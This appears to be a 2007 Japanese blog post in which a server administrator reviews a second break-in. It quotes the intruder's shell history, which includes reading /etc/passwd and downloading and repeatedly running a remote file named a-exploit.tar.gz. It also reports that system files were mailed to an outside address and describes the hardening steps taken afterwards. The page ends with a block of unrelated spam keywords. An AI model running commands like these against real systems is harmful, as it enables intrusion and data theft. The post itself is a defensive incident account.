ls
cd
ls
cd public_html/
ls
emacs index.html
ls -laF
emacs index.html
uname -a
ls -a
cd log
ls -a
cat /etc/passwd
wget geocities.com/paul981ro/a-exploit.tar.gz
uname -r
cat /etc/issue
chmod +x a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
exit

ウェブページのコンテンツフォルダに入ってindex.htmlをemacsで開いているが、タイムスタンプは変わっていないので改ざんしてないようだ。
その後ウェブのアクセスログが収められているlogフォルダに移動している。
パスワードファイルを眺めた。おそらく新しいアカウント情報を得るためだろう。
ウェブからa-exploit.tar.gzをローカルにコピーした。
実行属性を立てて実行した。

調べてみるとa-exploit.tar.gzという名前のプロセスが動いているではないですか。即座にkillする。
exploitという名前から察するに、セキュリティホールを利用したアタックを掛けるもののようだ。
ネットワークトラフィックを見たところ、目視した感じでは目立ったトラフィックの増大はないようだ。どこかに迷惑をかけてなければ良いけど。

また、maillogには、このアカウントユーザからyouareinusa@gmail.com宛にメールが発信されていたログが残っていた。おそらく起動されていたプロセスが発信したのだろう。
しかし、間抜けな事にyouareinusa@gmail.comはUser Unknownで、エラーメールがこのアカウント宛に戻ってきていた。ちなみにこのアカウントのメールは使用されていない。
エラーで戻ってきたメールの内容を見ると、メールにはpasswdファイル、hostsファイル、www.yahoo-ht2.akadns.netへのpingの結果、uname -aの結果が収められていた。

今回の侵入も以前と同じaolからのアクセスだ。同一犯の可能性が高い。今回のアカウント情報は前回侵入した時に得たアカウント情報をクラックして得た物だとしても、最初の侵入の際はどうしたんだろう。本当に気味が悪い。

passwdファイルを参照しているが、shadowファイルには触れていない。ユーザアカウントの一覧とshellアカウントの有無は得られるが、パスワード（暗号化されているが）は要らないんだろうか。

とりあえずアカウント設定を見直してshellが不要なユーザからは、ログインシェルを外した。sshもメンテナンス用に開けていたが滅多に使わないのでサービスを停止した。外部からのメンテには、特定のホストからのtelnetログインだけ許可しておく事にした。

最初の侵入に至ったヒントはどこから漏れたんだろう。とても気になる。

Posted by masa at 2007年1月24日 15:38

トラックバックURL

このエントリーのトラックバックURL:
http://www.smilemark.net/cgi-bin/MT/mt-tb.cgi/1618

コメントしてください

Syndicate this site (XML)

CHEAPEST AIRFARE TO PHILIPPINES FROM USA

LAS VEGAS DEALS HOTELS FLIGHTS

WHAT IS THE GENERIC LIPITOR

CARISOPRODOL 350MG TABLET WAT

DOG SEPARATION ANXIETY PUPPY

BREAST ENHANCEMENT CREAM SCAMS

DORZOLAMIDE DRUG

HEALTH INSURANCE FOR CANADIANS TRAVELLING ABROAD

BMI BABY CHEAP FLIGHTS TO AMSTERDAM

HOODIA GORDONII CACTUS SAFE

DEPO PROVERA PERIODS STOP

FIVE DIAMOND RESORTS

DIFFERENCE BETWEEN NORPACE AND CR

CAN ZYRTEC CAUSE FATIGUE

BYETTA PRICE EXENATIDE

COSTA ALLEGRA DECK PLAN

ALOCRIL SIDE EFFECTS

CHANTIX SIDE EFFECTS DREAMS

VIAGRA TIME

GINSENG SELL

PROPECIA SIDE EFFECTS

CALIFORNIA LOTTERY RAFFLE

A FAMOSA RESORT PACKAGE RM98

IS ULTRACET ANY GOOD

LAMISIL USES

SAFE HERBAL ALTERNATIVE VIAGRA

ORTHO TRI CYL LO TAB

CURE EJACULATION ERECTION HARDER PREMATURE

ISOTRETINOIN GEL PATIENTS

ODDS NCAA FOOTBALL BOWL GAMES

GINA ALLEGRA

CELLULAR SUN COLOMBIA

FREE UNO ATTACK RULES

BRITE TIP

smilemark blog :-)

Yes, I'm really enjoying everything!

2007年1月24日

●再び侵入されたorz